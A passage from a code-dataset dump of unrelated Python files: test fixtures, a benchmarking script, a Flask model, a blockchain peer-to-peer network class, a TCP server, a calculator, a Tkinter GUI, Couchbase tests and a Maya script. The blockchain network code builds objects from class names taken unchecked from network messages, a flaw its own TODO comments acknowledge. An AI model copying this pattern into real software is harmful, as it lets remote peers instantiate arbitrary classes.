df.unpersist()\n\n\n@pytest.yield_fixture(scope=\"module\")\ndef viaf_clusters(sc, spark):\n \"\"\"Build normalized VIAF Works dataframe\"\"\"\n p = str(pathlib.Path(__file__).parent / 'viaf_fixtures')\n df = VIAFCluster.from_files(p)\n df.cache()\n yield df\n df.unpersist()\n\n\n@pytest.yield_fixture(scope=\"module\")\ndef otl(sc, spark):\n \"\"\"Build normalized OTL dataframe\"\"\"\n p = str(data_path('otl'))\n df = OTLRecord.from_files(p)\n df.cache()\n yield df\n df.unpersist()\n\n\n@pytest.yield_fixture(scope=\"module\")\ndef crossref(sc, spark):\n \"\"\"Load & cache Crossref dataframe\"\"\"\n p = str(pathlib.Path(__file__).parent / 'crossref_fixtures')\n df = CrossrefRecord.from_files(p)\n df.cache()\n yield df\n df.unpersist()\n","sub_path":"tests/osp_pipeline/catalog/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"271318124","text":"\"\"\"\n- This program runs the code for increasing number of addiction levels and records the runtime\n- Make sure to change \"output_file\" & \"stochastic\" variable to switch between deterministic & stochastic\n\"\"\"\n\nimport json\nimport subprocess\nimport datetime\nimport pandas as pd\nimport os\nimport csv\n\nparam_file = \"./data/run_parameters.json\"\nfname = './data/stock_counts.csv'\noutput_file = \"./outputs/timings/stochastic_addiction.csv\"\nstochastic = 1\n\nfor addiction in [4,5,10,20,30,40,50]:\n \n print('*****')\n print(\"Running Simulation for addiction: \" + str(addiction))\n print('*****')\n\n # open the run_parameters file\n with open(param_file, 'r') as f:\n params = json.load(f)\n \n # adjust years\n params['years'] = 1\n params['num_foi'] = 10\n params['stochastic'] = stochastic\n params['sruns'] = 10\n\n # save adjusted parameters file\n with open(param_file, 'w') as f:\n json.dump(params, f)\n\n # open the stock count file and adjust\n with open(fname) as inf:\n reader = csv.reader(inf.readlines())\n \n lines = list(reader)\n # set number of age groups\n lines[-1][1] = str(3)\n # set number of addiction levels\n lines[-2][1] = str(addiction)\n\n with open(fname, 'w') as outf:\n writer = csv.writer(outf)\n for line in lines:\n writer.writerow(line)\n \n # run simulation\n start = datetime.datetime.now()\n subprocess.call([\"python3\",\"system_dynamics.py\",\"./data/run_parameters.json\"], shell=False)\n seconds = (datetime.datetime.now() - start).total_seconds()\n\n # Save time to file\n if os.path.isfile(output_file):\n pd.DataFrame({'addiction' : [addiction], 'time': [seconds]}).to_csv(output_file, index=False,mode='a',header=False)\n else:\n pd.DataFrame({'addiction' : [addiction], 'time': [seconds]}).to_csv(output_file, index=False)\n\n","sub_path":"run_scale_addiction.py","file_name":"run_scale_addiction.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"218552271","text":"from flaskblog import db\n\n\nclass Articles(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n crypto_name = db.Column(db.String(20), nullable=False)\n header = db.Column(db.Text, nullable=False)\n paragraph = db.Column(db.Text, nullable=False)\n\n def __init__(self, crypto_name, header, paragraph):\n self.crypto_name = crypto_name\n self.header = header\n self.paragraph = paragraph\n\n","sub_path":"flaskblog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"402601443","text":"# noinspection PyPep8Naming\nimport array\nimport base64\nimport inspect\nimport socket\nimport threading\nimport traceback\nfrom json import JSONDecodeError\n\nimport time\n\nimport sys\n\nfrom energyblockchain.blockchain.Block import Block\nfrom energyblockchain.network.Message import *\nfrom energyblockchain.blockchain.transaction.Transaction import *\n\n\nclass ChainNetwork:\n PROTOCOL_VER = 1\n\n def __init__(self, pubkey: str, clientname: str, bootstrapIP: str, blockchain):\n \"\"\"\n :type blockchain: Blockchain\n \"\"\"\n self.blockchain = blockchain\n self.pubkey = pubkey\n self.clientname = clientname\n self.connections = list()\n self.connectionlocks = dict()\n self.seen_messages = list()\n\n self.kill = False\n\n self._pending_updates = list()\n self._update_condition = threading.Condition()\n self._update_thread = threading.Thread(target=self._update_thread_func)\n self._update_thread.start()\n\n # Fetch own IP\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n self.ip = s.getsockname()[0]\n s.close()\n\n if bootstrapIP is not None:\n try:\n client = socket.socket()\n client.settimeout(3)\n client.connect((bootstrapIP, 12345))\n thread = threading.Thread(target=self._accept_connection, args=(client, bootstrapIP)) # Start new thread\n thread.start()\n time.sleep(2)\n self.send_message(ID(PUBKEY=pubkey, PROTOCOL_VER=ChainNetwork.PROTOCOL_VER, CLIENT_NAME=clientname), client)\n except IOError as e:\n print(e)\n\n serverthread = threading.Thread(target=self._start_server)\n serverthread.start()\n\n def _update_thread_func(self):\n while not self.kill:\n if len(self._pending_updates) == 0: # If no pending tasks\n with self._update_condition: # Acquire lock on condition\n self._update_condition.wait(timeout=3.0) # Wait until new task is added and update thread is notified\n else:\n for update in self._pending_updates:\n # noinspection PyBroadException\n try:\n if update(): # Call update; if update returns true, remove from pending list\n self._pending_updates.remove(update)\n except BaseException as e:\n print(\"STATE UPDATES SHOULD NOT RAISE EXCEPTIONS!\")\n traceback.print_exc()\n sys.exit(-1)\n\n def add_update(self, update):\n if update is not None:\n self._pending_updates.append(update) # Add update to list of updates\n with self._update_condition: # Acquire lock condition\n self._update_condition.notify() # Notify update thread of new update\n\n def _accept_connection(self, connection, address):\n try:\n connection.settimeout(3.0)\n self._add_connection(connection)\n datalist = [] # Cache for incomplete messages\n while not self.kill:\n try:\n data = connection.recv(1024)\n if (not data) and len(data) > 0: # At End of Stream, try to parse remaining cache\n self.add_update(self.try_parse(datalist, connection))\n break\n for b in data:\n if b == 30: # Check if byte is record-separator; codepoint and byte are identical for ASCII characters\n self.add_update(self.try_parse(datalist, connection))\n datalist.clear()\n else:\n datalist.append(b)\n except socket.timeout:\n pass\n except BaseException as e:\n print(type(e))\n print(e)\n raise e\n else:\n self._del_connection(connection)\n connection.close()\n\n def _start_server(self):\n try:\n server = socket.socket()\n server.bind((self.ip, 12345))\n server.listen(0)\n server.settimeout(3.0)\n while not self.kill:\n try:\n conn, addr = server.accept()\n thread = threading.Thread(target=self._accept_connection, args=(conn, addr)) # Start new thread\n thread.start()\n except socket.timeout:\n pass\n except IOError as e:\n print(type(e))\n print(e)\n except IOError as e:\n print(type(e))\n print(e)\n\n def try_parse(self, datalist: list, connection):\n try:\n string = array.array('B', datalist).tobytes().decode('utf-8')\n print(\"Received: '\" + string + \"'\")\n inputjson = json.loads(string, encoding='utf-8')\n if type(inputjson) is dict:\n # Parse received message to message object class\n assert isinstance(inputjson['REQUEST'], str)\n clazz = globals()[inputjson['REQUEST']] # TODO: _REALLY_ NEEDS INPUT SANITATION\n if inspect.isclass(clazz):\n del inputjson['REQUEST']\n message = clazz(**inputjson)\n if not isinstance(message, MESSAGE):\n # Something has gone terribly wrong\n pass\n if message.MESSAGE_ID not in self.seen_messages:\n self.seen_messages.append(message.MESSAGE_ID)\n if len(self.seen_messages) > 50:\n self.seen_messages.pop(0)\n if message.is_broadcasted():\n print(\"BROADCASTING: \" + str(message))\n self.send_message(message, None)\n if message.REQUEST == 'ID': # No jump tables in python >.>\n # Not operator used to turn None return type into True to indicate success\n return lambda: not self.send_message(\n ID_ACK(PUBKEY=self.pubkey, PROTOCOL_VER=ChainNetwork.PROTOCOL_VER, CLIENT_NAME=self.clientname), connection)\n elif message.REQUEST == 'ID_ACK':\n # Uses or operator to combine both expressions into a single expression; send_message always returns None\n return lambda: not (self.send_message(ADDR(IP=self.ip, PUBKEY=self.pubkey), connection) or\n self.send_message(GETINV(BLOCK_HASH=self.blockchain.manifest.head, PUBKEY=self.pubkey), connection))\n elif message.REQUEST == \"INV\":\n assert isinstance(message, INV)\n return lambda: not self.blockchain.load_hashes(message.BLOCK_HASHES, message.TX_HASHES)\n elif message.REQUEST == \"GETINV\":\n assert isinstance(message, GETINV)\n with self.blockchain.mutex:\n missed_hashes = list()\n current_hash = self.blockchain.manifest.head\n while current_hash != message.BLOCK_HASH and current_hash != \"ROOT\":\n missed_hashes.append(current_hash)\n current_hash = self.blockchain.manifest.blocks[current_hash]\n return lambda: not self.send_message(\n INV(BLOCK_HASHES=missed_hashes, TX_HASHES=self.blockchain.manifest.transactions, PUBKEY=self.pubkey), connection)\n elif message.REQUEST == \"GETBLOCK\":\n assert isinstance(message, GETBLOCK)\n with self.blockchain.mutex:\n block = self.blockchain.load_block(message.BLOCK_HASH)\n b64 = base64.b64encode(block.block_bytes()).decode(\"utf-8\")\n return lambda: not self.send_message(BLOCK(BLOCK_HASH=block.block_hash(), BLOCK_CONTENT=b64, PUBKEY=self.pubkey),\n connection)\n elif message.REQUEST == \"BLOCK\":\n assert isinstance(message, BLOCK)\n return lambda: self.blockchain.import_block(Block(**json.loads(base64.b64decode(message.BLOCK_CONTENT).decode('utf-8'))))\n elif message.REQUEST == \"GETTRANSACTION\":\n assert isinstance(message, GETTRANSACTION)\n with self.blockchain.mutex:\n tx = self.blockchain.load_tx(message.TX_HASH)\n if tx:\n return lambda: not self.send_message(TRANSACTION(tx.tx_hash(), tx.to_b64(), self.pubkey), connection)\n else:\n return None\n elif message.REQUEST == \"TRANSACTION\":\n assert isinstance(message, TRANSACTION)\n dec = base64.b64decode(message.TX_CONTENT)\n tx_dict = json.loads(dec.decode('utf-8'))\n clazz = globals()[tx_dict[\"class\"]] # TODO: Really needs sanitation\n del tx_dict[\"class\"]\n tx = clazz(**tx_dict)\n return lambda: not self.blockchain.import_tx(tx)\n else:\n print('Request: ' + message.REQUEST)\n pass\n else:\n print('No such class: ' + inputjson['REQUEST'])\n pass\n else:\n print('Input json is not dict! ' + str(inputjson))\n except JSONDecodeError as e:\n # Invalid json\n print(e)\n\n def _add_connection(self, connection):\n self.connections.append(connection)\n self.connectionlocks[connection] = threading.Lock()\n\n def _del_connection(self, connection):\n with self.connectionlocks[connection]:\n self.connectionlocks[connection] = None\n self.connections.remove(connection)\n\n def send_message(self, message: MESSAGE, connection):\n \"\"\"\n Sends a message to the specified connection, or broadcasts it\n :param message: Message to send\n :param connection: Connection to send to, or if None, broadcast the message\n \"\"\"\n if connection is not None:\n print('Sending: ' + str(message.to_bytes()))\n with self.connectionlocks[connection]:\n connection.send(message.to_bytes())\n else:\n print('Broadcasting: ' + str(message.to_bytes()))\n for connection in self.connections:\n with self.connectionlocks[connection]:\n print(connection)\n connection.send(message.to_bytes())\n\n def close(self):\n self.kill = True\n pass\n","sub_path":"energyblockchain/network/ChainNetwork.py","file_name":"ChainNetwork.py","file_ext":"py","file_size_in_byte":11396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"556353965","text":"import socket\nimport threading\nimport signal\n\n\nIS_EXIT = False\nthrs = []\n\n\ndef signal_handler(signal, frame):\n print('You pressed Ctrl+C!')\n global IS_EXIT\n IS_EXIT = True\n\n\ndef serveclient(s_client, n):\n s_client.send(b'hello')\n data = s_client.recv(1024)\n if data:\n print(f\"client{n} send: {data}\")\n s_client.send(b'bye')\n s_client.close()\n\n\nsignal.signal(signal.SIGINT, signal_handler)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('127.0.0.1', 9999))\ns.listen(5)\ns.settimeout(1)\nn = 0\nprint('MT server is working ...')\nwhile True:\n try:\n s_client, addr_client = s.accept()\n n = n+1\n t = threading.Thread(target=serveclient,\n args=(s_client, n))\n t.start()\n thrs.append(t)\n except socket.timeout:\n if IS_EXIT:\n for t in thrs:\n t.join()\n print('all threads are finished')\n s.close()\n break\n\n","sub_path":"tcpsThr.py","file_name":"tcpsThr.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"561989503","text":"# Calculadora com Python3\nimport os\nwhile True:\n\n # Perguntar qual é o tipo de operação\n operacao = input('Qual opreração (+, -, *, /)? ou \\'Q\\' para sair ')\n if operacao == 'Q' or operacao == 'q':\n break\n\n elif operacao == '+' or operacao == '-' or operacao == '*' or operacao == '/': \n # Perguntar o primeiro numero\n x = int(input('Digite o primeiro numero: '))\n\n # Perguntar o segundo numero\n y = int(input('Digite o segundo numero: '))\n\n # Calculo desses 2 numeros\n if operacao == '+':\n result = x + y\n\n elif operacao == '-':\n result = x - y\n\n elif operacao == '*':\n result = x * y\n\n elif operacao == '/':\n result = x / y\n\n else:\n print('Operação Invalida')\n\n # Imprimir o resultado na tela\n print(result)\n \n input('PRESS ENTER')\n os.system('clear')\n \n else:\n print('Operação Invalida')\n input('PRESS ENTER')\n os.system('clear')","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"612310385","text":"from tkinter import Frame, messagebox, Button, IntVar, Menu\n\nimport view.window\nimport view.newsFeed\nimport view.queue\nimport view.clientButton\nimport view.statisticWindow\n\nimport logic.case\nimport logic.client\n\nimport random\n\n\nclass MainWindow(Frame):\n def __init__(self, root, n_case: int = 6, n_window: int = 6, **kw):\n super().__init__(root, **kw)\n\n self._master_frame = Frame(self.master)\n self._master_frame.grid(row=0, column=0, sticky='nwes')\n\n self._stats_view = False\n self._case_list = []\n self._window_list = []\n self._queue_list = []\n self._count_variable_list = []\n\n self._MAX_QUEUE_SIZE = 10\n self._MAX_CASE_NUMBER = 6\n self._MAX_WINDOW_NUMBER = 6\n self._news_feed = None\n\n top_section = Frame(self._master_frame, height=350)\n top_section.pack_propagate(False)\n bottom_section = Frame(self._master_frame, height=240)\n bottom_section.pack_propagate(False)\n\n top_section.pack(fill='x', padx=20, pady=20)\n bottom_section.pack(fill='both', padx=20, pady=20)\n\n self._queue_frame = Frame(bottom_section)\n self._client_frame = Frame(top_section, padx=20, pady=20)\n self._window_frame = Frame(top_section)\n\n self.init_news_feed_section(bottom_section)\n self.init_case(n_case)\n self.init_window(n_window)\n\n self._window_frame.pack(side='left')\n self._queue_frame.pack(side='left', expand='false', fill='both', anchor='w')\n self._client_frame.pack(anchor='e')\n self.init_menubar()\n\n def init_case(self, n_case):\n for i in range(n_case):\n self.add_case()\n\n def init_window(self, n_window):\n for i in range(n_window):\n self.add_window()\n\n def add_window(self):\n if len(self._window_list) < self._MAX_WINDOW_NUMBER:\n frame = Frame(self._window_frame)\n w = view.window.Window(frame, self._case_list, 'okienko ' + str(len(self._window_list)), self._news_feed)\n self._window_list.append(w)\n frame.bind('<>', self.sh_next_client)\n frame.pack(side='left')\n\n def remove_window(self):\n if len(self._window_list) > 1:\n self._window_frame.winfo_children()[-1].destroy()\n self._window_list.pop()\n\n def add_client(self):\n row = Frame(self._client_frame)\n b = view.clientButton.ClientButton(row, self._case_list[-1])\n b.connect_count_variable(self._count_variable_list[-1])\n row.bind(\"<>\", self.sh_add_client)\n row.pack()\n\n def remove_client(self):\n self._client_frame.winfo_children()[-1].destroy()\n\n def add_queue(self):\n row1 = Frame(self._queue_frame)\n row2 = Frame(self._queue_frame)\n client_type = logic.client.ClientType\n\n case = self._case_list[len(self._queue_list)]\n normal = view.queue.Queue(row1, case, client_type.NORMAL, self._MAX_QUEUE_SIZE, str(case.id))\n vip = view.queue.Queue(row2, case, client_type.VIP, self._MAX_QUEUE_SIZE, str(case.id) + ' VIP')\n\n v = IntVar()\n self.connect_variable_to_queue(normal, v)\n self.connect_variable_to_queue(vip, v)\n self._queue_list.append([normal, vip])\n self._count_variable_list.append(v)\n\n row1.pack()\n row2.pack()\n\n def remove_queue(self):\n self._queue_list.pop()\n self._count_variable_list.pop()\n self._queue_frame.winfo_children()[-1].destroy()\n self._queue_frame.winfo_children()[-1].destroy()\n\n def connect_variable_to_queue(self, queue, variable):\n queue.connect_news_feed(self._news_feed)\n queue.connect_count_variable(variable)\n\n def init_news_feed_section(self, master):\n frame = Frame(master)\n self._news_feed = view.newsFeed.NewsFeed(frame)\n frame.pack(side='left', expand='false', fill='y')\n\n def init_menubar(self):\n menubar = Menu(self._master_frame)\n self.master.config(menu=menubar)\n\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label='Zakończ', command=self.close)\n menubar.add_cascade(label='Plik', menu=filemenu)\n\n casemenu = Menu(menubar, tearoff=0)\n casemenu.add_command(label='Dodaj sprawę', command=self.add_case)\n casemenu.add_command(label='Usuń sprawę', command=self.remove_case)\n menubar.add_cascade(label='Sprawa', menu=casemenu)\n\n windowmenu = Menu(menubar, tearoff=0)\n windowmenu.add_command(label='Dodaj okno', command=self.add_window)\n windowmenu.add_command(label='Usuń okno', command=self.remove_window)\n menubar.add_cascade(label='Okienko', menu=windowmenu)\n\n statsmenu = Menu(menubar, tearoff=0)\n statsmenu.add_command(label='Pokaż statystyki', command=self.open_stats)\n statsmenu.add_command(label='Reset', command=self.reset)\n menubar.add_cascade(label='Statysyka', menu=statsmenu)\n\n def open_stats(self):\n if sum(sum(len(i) for i in j) for j in self._queue_list) > 0:\n messagebox.showinfo('Błąd', 'W kolejce są ludzie')\n else:\n self._stats_view = True\n view.statisticWindow.StatisticWindow(self.master, self._master_frame, self._window_list, self._case_list,\n self._stats_view)\n\n def reset(self):\n q = self._queue_list\n w = self._window_list\n\n for i in range(len(w)):\n w[i].reset()\n\n for i in range(len(q)):\n for j in range(len(q[i])):\n q[i][j].reset()\n\n self._news_feed.reset()\n\n if self._stats_view:\n self.open_stats()\n\n def check_window(self, client):\n for window in self._window_list:\n if window.available and window.check_client(client):\n window += client\n self._news_feed.add('Klient {} unika kolejki'.format(str(client)))\n break\n else:\n for q in self._queue_list:\n if q[client.client_type.value - 1].case.id == client.case.id:\n q[client.client_type.value - 1] += client\n # self._queue_list[client.case.id][client.client_type.value - 1] += client\n\n def sh_add_client(self, event):\n client = view.clientButton.ClientButton.new_client_list.pop(0)\n i = client.case.id\n j = client.client_type.value - 1\n ct = logic.client.ClientType\n\n for q in self._queue_list:\n if q[ct.VIP.value - 1].case.id == i:\n if len(q[ct.VIP.value - 1]) == 0 and len(q[ct.NORMAL.value - 1]) == 0:\n self.check_window(client)\n else:\n q[j] += client\n # if len(self._queue_list[i][ct.VIP.value - 1]) == 0 and len(self._queue_list[i][ct.NORMAL.value - 1]) == 0:\n # self.check_window(client)\n # else:\n # self._queue_list[i][j] += client\n\n def check_queue(self, window):\n ct = logic.client.ClientType\n\n if window.available:\n add_list = []\n\n for i in range(len(window.case_list)):\n if window.case_list[i].state and len(self._queue_list[i][ct.VIP.value - 1]) > 0:\n add_list.append((i, ct.VIP.value - 1))\n\n if len(add_list) == 0:\n for i in range(len(window.case_list)):\n if window.case_list[i].state and len(self._queue_list[i][ct.NORMAL.value - 1]) > 0:\n add_list.append((i, ct.NORMAL.value - 1))\n\n if len(add_list) > 0:\n q = random.choice(add_list)\n window += self._queue_list[q[0]][q[1]].pop()\n return self._queue_list[q[0]][q[1]]\n\n def sh_next_client(self, event):\n window_th = view.window.Window.waiting_windows.pop(0)\n queue_to_refresh = self.check_queue(window_th)\n\n if queue_to_refresh:\n message = 'Klient przechodzi z kolejki {} do okienka {}'.format(str(queue_to_refresh), str(window_th))\n self._news_feed.add(message)\n\n def add_case(self):\n if len(self._case_list) < self._MAX_CASE_NUMBER:\n case = logic.case.Case('sprawa ' + str(len(self._case_list)))\n self._case_list.append(case)\n self.add_queue()\n self.add_client()\n\n for window in self._window_list:\n window.update_case_bulb()\n\n def remove_case(self):\n if len(self._case_list) > 1:\n self._case_list.pop()\n self.remove_queue()\n self.remove_client()\n\n for window in self._window_list:\n window.update_case_bulb()\n\n def close(self):\n self.master.destroy()\n","sub_path":"view/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"515427181","text":"from django.urls import path, include\n\nfrom .views import login_user, register, logout_user\n\nurlpatterns = [\n path('', include('profiles.urls')),\n path('login/', login_user, name='login'),\n path('register/', register, name='register'),\n path('logout/', logout_user, name='logout_user'),\n\n]\n","sub_path":"quiz_project/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"57847367","text":"from random import randint\n\nfrom basetestcase import BaseTestCase\nfrom couchbase_helper.documentgenerator import doc_generator\nfrom couchbase_helper.durability_helper import DurabilityHelper\nfrom membase.api.rest_client import RestConnection\n\n\nclass DurabilityTestsBase(BaseTestCase):\n def setUp(self):\n super(DurabilityTestsBase, self).setUp()\n\n self.key = 'test_docs'.rjust(self.key_size, '0')\n self.simulate_error = self.input.param(\"simulate_error\", None)\n self.error_type = self.input.param(\"error_type\", \"memory\")\n self.doc_ops = self.input.param(\"doc_ops\", None)\n self.with_non_sync_writes = self.input.param(\"with_non_sync_writes\",\n False)\n self.skip_init_load = self.input.param(\"skip_init_load\", False)\n self.crud_batch_size = 100\n self.num_nodes_affected = 1\n if self.num_replicas > 1:\n self.num_nodes_affected = 2\n\n if self.doc_ops:\n self.doc_ops = self.doc_ops.split(';')\n\n self.durability_helper = DurabilityHelper(\n self.log, len(self.cluster.nodes_in_cluster),\n self.durability_level)\n\n # Initialize cluster using given nodes\n nodes_init = self.cluster.servers[1:self.nodes_init] \\\n if self.nodes_init != 1 else []\n self.task.rebalance([self.cluster.master], nodes_init, [])\n self.cluster.nodes_in_cluster.extend([self.cluster.master]+nodes_init)\n\n # Disable auto-failover to avaid failover of nodes\n status = RestConnection(self.cluster.master) \\\n .update_autofailover_settings(False, 120, False)\n self.assertTrue(status, msg=\"Failure during disabling auto-failover\")\n\n # Create default bucket and add rbac user\n self.bucket_util.create_default_bucket(\n replica=self.num_replicas, compression_mode=self.compression_mode,\n bucket_type=self.bucket_type)\n self.bucket_util.add_rbac_user()\n\n self.cluster_util.print_cluster_stats()\n self.bucket = self.bucket_util.buckets[0]\n if not self.skip_init_load:\n if self.target_vbucket and type(self.target_vbucket) is not list:\n self.target_vbucket = [self.target_vbucket]\n\n self.log.info(\"Creating doc_generator..\")\n doc_create = doc_generator(\n self.key,\n 0,\n self.num_items,\n doc_size=self.doc_size,\n doc_type=self.doc_type,\n target_vbucket=self.target_vbucket,\n vbuckets=self.vbuckets)\n self.log.info(\"doc_generator created\")\n\n self.log.info(\"Loading {0} items into bucket\"\n .format(self.num_items))\n task = self.task.async_load_gen_docs(\n self.cluster, self.bucket, doc_create, \"create\", 0,\n batch_size=10, process_concurrency=8,\n replicate_to=self.replicate_to, persist_to=self.persist_to,\n durability=self.durability_level,\n timeout_secs=self.sdk_timeout)\n self.task.jython_task_manager.get_task_result(task)\n\n # Verify initial doc load count\n self.bucket_util._wait_for_stats_all_buckets()\n self.bucket_util.verify_stats_all_buckets(self.num_items)\n\n self.bucket_util.print_bucket_stats()\n self.log.info(\"=== DurabilityBaseTests setup complete ===\")\n\n def tearDown(self):\n # Fail the test case, if the failure is set\n super(DurabilityTestsBase, self).tearDown()\n\n def get_random_node(self):\n rand_node_index = randint(1, self.nodes_init-1)\n return self.cluster.nodes_in_cluster[rand_node_index]\n\n def getTargetNodes(self):\n def select_randam_node(nodes):\n rand_node_index = randint(1, self.nodes_init-1)\n if self.cluster.nodes_in_cluster[rand_node_index] not in node_list:\n nodes.append(self.cluster.nodes_in_cluster[rand_node_index])\n\n node_list = list()\n if len(self.cluster.nodes_in_cluster) > 1:\n # Choose random nodes, if the cluster is not a single node cluster\n while len(node_list) != self.num_nodes_affected:\n select_randam_node(node_list)\n else:\n node_list.append(self.cluster.master)\n return node_list\n","sub_path":"pytests/epengine/durability_base.py","file_name":"durability_base.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"399735768","text":"#-*- coding: utf-8 -*-\nimport maya.cmds as rig\nfrom RIG.selectJoint import SK_selectSkinJnt \n\ndef SK_renameSkinJoint():\n legs = rig.ls('*_ankle_drv_jnt')\n arms = rig.ls('*_wrist_drv_jnt')\n \n for Leg in legs:\n legPrefix = Leg.split('_')[0]\n legPrefixName = legPrefix+'_Leg'\n legPrefixMidName = legPrefix+'Leg' \n upBendJnt = rig.ls(legPrefix+'leg_bend'+'*'+'jnt')\n upLen = len(upBendJnt)\n upBendJnt.insert(0,upBendJnt[0].replace('1_jnt','0_startJnt'))\n for i,Jnt in enumerate(upBendJnt):\n rig.rename(Jnt,legPrefixName+str(i+1)+'_jnt')\n \n downBendJnt = rig.ls(legPrefix+'knee_bend'+'*'+'jnt')\n downLen = len(downBendJnt) \n downBendJnt.insert(0,rig.rename(legPrefixMidName+'_MidJoint_jnt',legPrefixName+'1_jnt'))\n for i,Jnt in enumerate(downBendJnt):\n rig.rename(Jnt,legPrefixName+str(i+upLen+2)+'_jnt')\n \n rig.rename(Leg,legPrefixName+str(downLen+upLen+3)+'_jnt')\n \n for arm in arms:\n armPrefix = arm.split('_')[0]\n armPrefixName = armPrefix+'_Arm'\n armPrefixMidName = armPrefix+'Arm' \n upBendJnt = rig.ls(armPrefix+'upArm_bend'+'*'+'jnt')\n upLen = len(upBendJnt)\n upBendJnt.insert(0,upBendJnt[0].replace('1_jnt','0_startJnt'))\n for i,Jnt in enumerate(upBendJnt):\n rig.rename(Jnt,armPrefixName+str(i+1)+'_jnt')\n \n downBendJnt = rig.ls(armPrefix+'elbow_bend'+'*'+'jnt')\n downLen = len(downBendJnt) \n downBendJnt.insert(0,rig.rename(armPrefixMidName+'_MidJoint_jnt',armPrefixName+'1_jnt'))\n for i,Jnt in enumerate(downBendJnt):\n rig.rename(Jnt,armPrefixName+str(i+upLen+2)+'_jnt')\n \n rig.rename(arm,armPrefixName+str(downLen+upLen+3)+'_jnt')\n \n \n# 对腰,脖子,头 ,改名\n allSkinJoints = SK_selectSkinJnt()\n rig.select(cl = True)\n \n midJoint = []\n for jnt in allSkinJoints:\n if not ('Rt' in jnt or 'Lf' in jnt):\n midJoint.append(jnt) \n \n waistJoint = []\n for jnt in midJoint:\n if('waist' in jnt):\n waistJoint.append(jnt) \n \n waistJoint.insert(0,'hip_jnt')\n waistJoint.append('chest1_jnt')\n \n for i,jnt in enumerate(waistJoint):\n rig.rename(jnt,'spline'+str(i+1)+'_jnt')\n \n rig.rename('lower_jaw_jnt','head_jawLow_jnt')\n rig.rename('upper_jaw_jnt','head_jawUp_jnt')\n ","sub_path":"OLD/idmt/maya/RIG/commonly/renameBindJoint.py","file_name":"renameBindJoint.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"59198585","text":"from .base import BaseAPIClient, logger\nfrom .errors import HTTPError\n\n\nclass DataAPIClient(BaseAPIClient):\n def init_app(self, app):\n self.base_url = app.config['DM_DATA_API_URL']\n self.auth_token = app.config['DM_DATA_API_AUTH_TOKEN']\n\n # Audit Events\n\n def find_audit_events(\n self,\n audit_type=None,\n audit_date=None,\n page=None,\n acknowledged=None):\n\n params = {}\n if audit_type:\n params[\"audit-type\"] = audit_type\n if page is not None:\n params['page'] = page\n if audit_date is not None:\n params['audit-date'] = audit_date\n if acknowledged is not None:\n params['acknowledged'] = acknowledged\n\n return self._get(\n \"/audit-events\",\n params\n )\n\n def acknowledge_audit_event(self, audit_event_id, user):\n return self._post(\n \"/audit-events/{}/acknowledge\".format(audit_event_id),\n data={\n \"update_details\": {\n \"updated_by\": user\n }\n })\n\n # Suppliers\n\n def find_suppliers(self, prefix=None, page=None, framework=None):\n params = {}\n if prefix:\n params[\"prefix\"] = prefix\n if page is not None:\n params['page'] = page\n if framework is not None:\n params['framework'] = framework\n\n return self._get(\n \"/suppliers\",\n params=params\n )\n\n def get_supplier(self, supplier_id):\n return self._get(\n \"/suppliers/{}\".format(supplier_id)\n )\n\n def create_supplier(self, supplier_id, supplier):\n return self._put(\n \"/suppliers/{}\".format(supplier_id),\n data={\"suppliers\": supplier},\n )\n\n def update_supplier(self, supplier_id, supplier, user):\n return self._post(\n \"/suppliers/{}\".format(supplier_id),\n data={\n \"suppliers\": supplier,\n \"updated_by\": user,\n },\n )\n\n def update_contact_information(self, supplier_id, contact_id,\n contact, user):\n return self._post(\n \"/suppliers/{}/contact-information/{}\".format(\n supplier_id, contact_id),\n data={\n \"contactInformation\": contact,\n \"updated_by\": user,\n },\n )\n\n def get_selection_answers(self, supplier_id, framework_slug):\n return self._get(\n \"/suppliers/{}/selection-answers/{}\".format(\n supplier_id, framework_slug))\n\n def answer_selection_questions(self, supplier_id, framework_slug,\n answers, user):\n return self._put(\n \"/suppliers/{}/selection-answers/{}\".format(\n supplier_id, framework_slug),\n data={\n \"updated_by\": user,\n \"selectionAnswers\": {\n \"questionAnswers\": answers\n }\n })\n\n # Users\n\n def create_user(self, user):\n return self._post(\n \"/users\",\n data={\n \"users\": user,\n })\n\n def get_user(self, user_id=None, email_address=None):\n if user_id is not None and email_address is not None:\n raise ValueError(\n \"Cannot get user by both user_id and email_address\")\n elif user_id is not None:\n url = \"{}/users/{}\".format(self.base_url, user_id)\n params = {}\n elif email_address is not None:\n url = \"{}/users\".format(self.base_url)\n params = {\"email\": email_address}\n else:\n raise ValueError(\"Either user_id or email_address must be set\")\n\n try:\n return self._get(url, params=params)\n except HTTPError as e:\n if e.status_code != 404:\n raise\n return None\n\n def authenticate_user(self, email_address, password, supplier=True):\n try:\n response = self._post(\n '/users/auth',\n data={\n \"authUsers\": {\n \"emailAddress\": email_address,\n \"password\": password,\n }\n })\n if not supplier 